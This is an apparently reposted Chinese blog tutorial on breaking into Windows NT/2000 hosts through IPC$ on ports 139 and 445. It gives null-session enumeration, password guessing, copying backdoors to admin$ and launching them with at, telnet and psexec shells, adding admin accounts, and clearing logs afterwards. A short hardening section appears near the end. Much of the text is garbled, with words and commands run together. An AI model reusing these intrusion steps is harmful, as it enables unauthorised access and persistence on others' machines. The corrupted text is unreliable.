445端口入侵详解

445端口入侵详解
关于“445端口入侵”的内容
445端口入侵详解
本站搜索更多关于“445端口入侵”的内容
445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?
445端口就是IPC 服务的默认端口
ipc ipc
三 什么是空会话
四 空会话可以做什么
五 ipc 使ipchackipc 连接失败的常见原因
八 复制文件失败的原因
九 关于 at 命令和 xp 对 ipc IPC 共享以及其他共享
十一 一些需要 shell 才能完成的命令
十二 入侵中可能会用到的命令
十三 对比过去和现今的 ipc ipc 入侵
十五 ipc ipc 入侵的文章可谓多如牛毛,攻击步骤甚至已经成为了固化的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。不过话虽这样说,我认为这些文章讲解的并不详细,一些内容甚至是错误的,以致对 ipc ipc 这部分东西尽量说清楚。
注意:本文所讨论的各种情况均默认发生在 win NT/2000 环境下, win98 将不在此次讨论之列。
二 什么是 ipc IPC (Internet Process Connection) 是共享 " 命名管道 "的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 IPC NT/2000IPNT/2000ipc 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享 (c ,d ,e )winntwindows(admin ) 共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说 ipc ipc 漏洞,其实 ipc ,NullsessionWindowsNT4.0使12643644LSALSA使便访使访WIN2000访SIDLSASIDS157SIDANONYMOUSLOGONSAM访EveryoneNetwork访访NT访everyone访2000Windows2000访便ipc 入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令:
1 首先,我们先建立一个空会话(当然,这需要目标开放 ipc netuse\ip\ipc “” /user:””
注意:上面的命令包括四个空格, net 与 use 中间有一个空格, use 后面一个,密码左右各一个空格。
2 查看远程主机的共享资源
命令: net view \ip
解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。
在 \*...* 的共享资源

资源共享名 类型 用途 注释

NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看远程主机的当前时间
命令: net time \ip
解释:用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的 NetBIOS 用户名列表(需要打开自己的 NBT )
命令: nbtstat -A ip
用此命令可以得到一个远程主机的 NetBIOS 用户名列表,返回如下结果:
Node IpAddress: [...] Scope Id: []
NetBIOS Remote Machine Name Table

Name Type Status

SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H < 1C > GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..MSBROWSE.<01> GROUP Registered
INet~Services < 1C > GROUP Registered
IS~SERVER……<00> UNIQUE Registered
MAC Address = 00-50-8B -9A -2D-37
以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立 IPC EventLogipc 所使用的端口是什么?
五 ipc 使1SMBServerMessageBlock)Windows2NBTNETBiosOverTCP/IP)使137UDP138UDP139TCPTCP/IPNETBIOS3WindowsNTSMBNBT使139TCPWindows2000SMBNBT445访win20001NBT访139445445RST139455445使1392NBT访445445win20001NBT,UDP137,138,TCP139,445LISTENING2NBT445ipc 会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听 139 或 445 端口, ipc ipchackipc便ipcipcipcipcipcipcipc 连接失败的常见原因
以下是一些常见的导致 ipc 1IPCWindowsNTWindowsNTDLLWindows9.x/Ment/2000/xpipc 连接, 98/me 是不能建立ipc 2ipc 连接,就需要响应方开启 ipc 使ipc 共享,将不能建立连接;
3 连接发起方未启动 Lanmanworkstation 服务(显示名为: Workstation ):它提供网络链结和通讯,没有它发起方无法发起连接请求;
4 响应方未启动 Lanmanserver 服务(显示名为: Server ):它提供了 RPC 支持、文件、打印以及命名管道共享, ipc ipc 连接;
5 响应方未启动 NetLogon ,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);
6 响应方的 139 , 445 端口未处于监听状态或被防火墙屏蔽;
7 连接发起方未打开 139 , 445 端口;
8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于 ’ 无法更新密码 ’ 这样的错误提示(显然空会话排除这种错误);
9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号 “” 即可;
10 如果在已经建立好连接的情况下对方重启计算机,那么 ipc ,5访使51Windows53iplanmanserver67lanmanworkstationipc
错误号 1219 ,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个 ipc 13261792NetLogon2242ipc 连接,但在 copy 时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?
1 对方未开启共享文件夹
这类错误出现的最多,占到 50% 以上。许多朋友在 ipc netviewIPipc 连接就一定有共享文件夹存在。
2 向默认共享复制失败
这类错误也是大家经常犯的,主要有两个小方面:
1 )错误的认为能建立 ipc c ,d ,admin 之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。 ipc ipc 共享,并不能说明默认共享一定存在。 ipc ipc 共享是一个命名管道,并不是哪个实际的文件夹,而默认共享却是实实在在的共享文件夹;
2 )由于 net view \IP 这个命令无法显示默认共享文件夹(因为默认共享带 ipcipc312Win2000ProAdministratorsBackupOperatorsWin2000ServerServerOperatros访3访4访1administrator2访访访6D访xinxin访使访DD 的默认共享,那么你却可以访问 D 4ipc 连接在实际操作过程中会出现各种各样的问题,上面我所总结的只是一些常见错误,没说到的,大家可以给我提个醒儿。
九 关于 at 命令和 xp 对 ipc atatpsexec.exec:\xinxin.exeadministrator1234psexec\ipuadministratorp1234cc:\xinxin.exeipcuppsexec.exexpipc 也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友很急切的提问为什么遇到 xp的时候,大部分操作都很难成功。我在这里就简单提一下吧,在 xp的默认安全选项中,任何远程访问仅被赋予来宾权限,也就是说即使你是用管理员帐户和密码,你所得到的权限也只是 Guest,因此大部分操作都会因为权限不够而失败,而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了 xp的管理员密码,我建议你尽量避开 ipc 管道。
十 如何打开目标的 IPC ipc 不是轻易就能打开的,否则就要天下打乱了。你需要一个 admin 权限的 shell ,比如 telnet ,木马, cmd 重定向等,然后在 shell 下执行:
net share ipc ipc 共享;
net share ipc /delipc 共享;如果你要给它开共享文件夹,你可以用:
net share xinxin=c:\
这样就把它的 c 盘开为共享名为 xinxin 共享文件夹了。(可是我发现很多人错误的认为开共享文件夹的命令是 net share c shellshellshellipc 连接下执行了,起了误导作用。那么下面我总结一下需要在 shell 才能完成的命令:
1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在 shell 下完成;
2 打开远程主机的 ipc shell3/shell4/shellpskillipc 入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的 shell (如 cmd , telnet 等)后,才能向远程主机执行。
1 建立 / 删除 ipc 1:netuse\127.0.0.1\ipc “” /user:””
2 )建立非空连接 :
net use \127.0.0.1\ipc /user:3:netuse\127.0.0.1\ipc /del
2 在 ipc 1:netview\127.0.0.12:nettime\127.0.0.13netbios:nbtstatA127.0.0.14/:netusez:\127.0.0.1\ccznetusez:/delz5:copy \IP copyc:\xinxin.exe\127.0.0.1\c 即将 c 盘下的 xinxin.exe 复制到对方 c 盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy \127.0.0.1\c \xinxin.exec: 6:at\IPat\127.0.0.011:00xinxin.exe使24system32/31netshare2netuser3netuser4netstart5/netstartnetstop6netuser/add7netuesr/active:yes8netlocalgroupadministrators/addshelltelnet41telnettelnetIPtelnet127.0.0.0232opentelnet.exetelnetOpenTelnet.exe\ipNTLMportOpenTelnet.exe\127.0.0.1administrator1901ipc 共享
2 )你要拥有管理员密码和帐号
3 )目标开启 RemoteRegistry 服务,用户就可以更改 ntlm 认证
4 )对仅 WIN2K/XP 有效
3 )用 psexec.exe 一步获得 shell ,需要 ipc 管道支持
psexec.exe \IP -u 管理员帐号 -p 密码 cmd
psexec.exe \127.0.0.1 -u administrator -p “” cmd
十三 对比过去和现今的 ipc ipc 入侵步骤写给大家,都是蛮经典的步骤:
[1]
C:>net use \127.0.0.1\ipc /user:admintitrators   [2]c:>netview\127.0.0.1 [3]C:>copysrv.exe\127.0.0.1\admin \system32
\ 将一次性后门 srv.exe 复制到对方的系统文件夹下,前提是 admin   [4]C:>nettime\127.0.0.1 [5]C:>at\127.0.0.1srv.exe atsrv.exeTaskScheduler  [6]C:>nettime\127.0.0.1 srv.exe[7]C:>telnet127.0.0.199 telnet127.0.0.1shell(shellDOS)99srv.exe  [8]C:\WINNT\system32>netstarttelnet shelltelnetsrv.exe便访telnet[9]C:>copyntlm.exe\127.0.0.1\admin \system32
\ 在原来那个窗口中将 ntlm.exe 传过去, ntlm.exe 是用来更改 telnet 身份验证的  
[10]
C:\WINNT\system32>ntlm.exe
\ 在 shell 窗口中运行 ntlm.exe ,以后你就可以畅通无阻的 telnet 这台主机了
[11]
C:>telnet 127.0.0.1 23
\ 在新窗口中 telnet 到 127.0.0.1 ,端口 23 可省略,这样我们又获得一个长期的后门
[12]
C:\WINNT\system32>net user 帐户名 密码 /add
C:\WINNT\system32>net uesr guest /active:yes
C:\WINNT\system32>net localgroup administrators 帐户名 /add
\telnet 上以后,你可以建立新帐户,激活 guest ,把任何帐户加入管理员组等
好了,写到这里我似乎回到了 2 , 3 年前,那时的 ipc ipc 入侵吧。
[1]
psexec.exe \IP -u 管理员帐号 -p 密码 cmd
\ 用这个工具我们可以一步到位的获得 shell
OpenTelnet.exe \server 管理员帐号 密码 NTLM 的认证方式 port
\ 用它可以方便的更改 telnet 的验证方式和端口,方便我们登陆
[2]
已经没有第二步了,用一步获得 shell 之后,你做什么都可以了,安后门可以用 winshell ,克隆就用 ca 吧,开终端用 3389.vbe ,记录密码用 win2kpass ,总之好的工具不少,随你选了,我就不多说了。
十四 如何防范 ipc 1()regedit[HKEYLOCALMACHINE\SYSTEM\CurrentControlSet\Control\LSA]RestrictAnonymous=DWORD11IPC 共享,但无法通过这种连接得到列举 SAM 帐号和共享信息的权限;在 Windows2000 中增加了 "2" ,未取得匿名权的用户将不能进行 ipc 121cmdnetshare2netshareipc /delete
net share admin /deletenetsharec /delete
net share d /deletee,f,3servernetstopserver/yserver4ipc 共享)
运行 -regedit
server 版 : 找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareServer ( DWORD )的键值改为 :00000000 。
pro 版 : 找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareWks ( DWORD )的键值改为 :00000000 。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使设置生效。
3 关闭 ipc :serveripc 共享,那就禁止 server 服务吧:
控制面板 - 管理工具 - 服务 - 找到 server 服务(右击) - 属性 - 常规 - 启动类型 - 选已禁用,这时可能会有提示说: XXX 服务也会关闭是否继续,因为还有些次要的服务要依赖于 server 服务,不要管它。
4 屏蔽 139 , 445 端口
由于没有以上两个端口的支持,是无法建立 ipc 139445ipc 入侵。
1 ) 139 端口可以通过禁止 NBT 来屏蔽
本地连接- TCP/IT 属性-高级- WINS -选‘禁用 TCP/IT 上的 NETBIOS ‘一项
2 ) 445 端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用 ipc 36ipc 穷举出密码,我觉得这才是最好的办法,增强安全意识,比不停的打补丁要安全的多。
十五 ipc 西1.ipc 入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?
答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵。
2. 你看下面的情况是为什么,可以连接但不能复制
net use \***...*\ipc$ ” 密码 ” /user:” 用户名 ”
命令成功
copy icmd.exe \***...*\admin 3.IPC ,且能建立空联接,但打开 C 、 D 盘时,都要求密码,我知道是空连接没有太多的权限,但没别的办法了吗?
答:建议先用流光或者别的什么扫描软件试着猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。
4. 我已经猜解到了管理员的密码,且已经 ipc netview\ipnetview\ipc , d opentelnet.exepsexec.exe5.ipc 连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事?
net uset ccbirds /add
答: ipc shellshelltelnet6.访0访访7.Win98ipc 连接吗?
答:理论上不可以,要进行 ipc win20008.netuse\ip\ipc “” /user “” 成功的建立了一个空会话,但用 nbtstat -A IP 却无法导出用户列表,这是为什么?
答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;还有可能是你自己的 NBT 没有打开, netstat 命令是建立在 NBT 之上的。  
9. 我建立 ipc ipc 连接,两个主机间同时建立两个 ipc 10.F:>netuseh:\211.161.134.\e
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?
答:你也太粗心了吧,这说明你有一个 h 盘了,映射到没有的盘符吧!
11. 我建立了一个连接 f:>net use \*...*\ipc$ “123” /user:”guest” 成功了,但当我映射时出现了错误,向我要密码,怎么回事?
F:>net use h: \*...*\c$
密码在 \*...*\c$ 无效。
请键入 \*...*\c :5访使C 这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。
12. 我用 superscan 扫到了一个开了 139 端口的主机,但为什么不能空连接呢?
答:你混淆了 ipc 139ipc 连接的主机一定开了 139 或 445 端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭 ipc .13.xpadministrator西5xp使514.netuse\192.168.0.2\ipc “password” /user:”administrator” 成功,可是 net use i: \192.168.0.2\c
出现请键入 \192.168.0.2 的密码,怎么回事情呢?我用的可是管理员呀?应该什么都可以访问呀?
答:虽然你具有管理员权限,但管理员在设置 c 盘共享权限时(注意:普通共享可以设置访问权限,而默认共享则不能)可能并未设置允许 administrator 访问,所以会出现上述问题。
15. 如果自己的机器禁止了 ipc ,ipc 连接别的机器?如果禁止 server 服务呢?
答:禁止以上两项仍可以发起 ipc$ 连接,不过这种问题自己动手试验会更好。
16. 能告诉我下面的两个错误产生的原因吗?
c:>net time \61.225..
系统发生 5 错误。
拒绝访问。
c:>net view \61.225..
系统发生 5 错误。
拒绝访问。
答:起初遇到这个问题的时候我也很纳闷,错误 5表示权限不够,可是连空会话的权限都可以完成上面的两个命令,他为什么不行呢?难道是他没建立连接?后来那个粗心的同志告诉我的确是这样,他忘记了自己已经删了 ipc$ 连接,之后他又输入了上面那两个命令,随之发生了错误 5 。
17. 您看看这是怎么回事?
F:>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。
答:答案很简单,你的命令错了,应该是 net time \ip
没输入 ip 地址,当然找不到服务器。 view 的命令也应该有 ip 地址,即: net view \ip

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值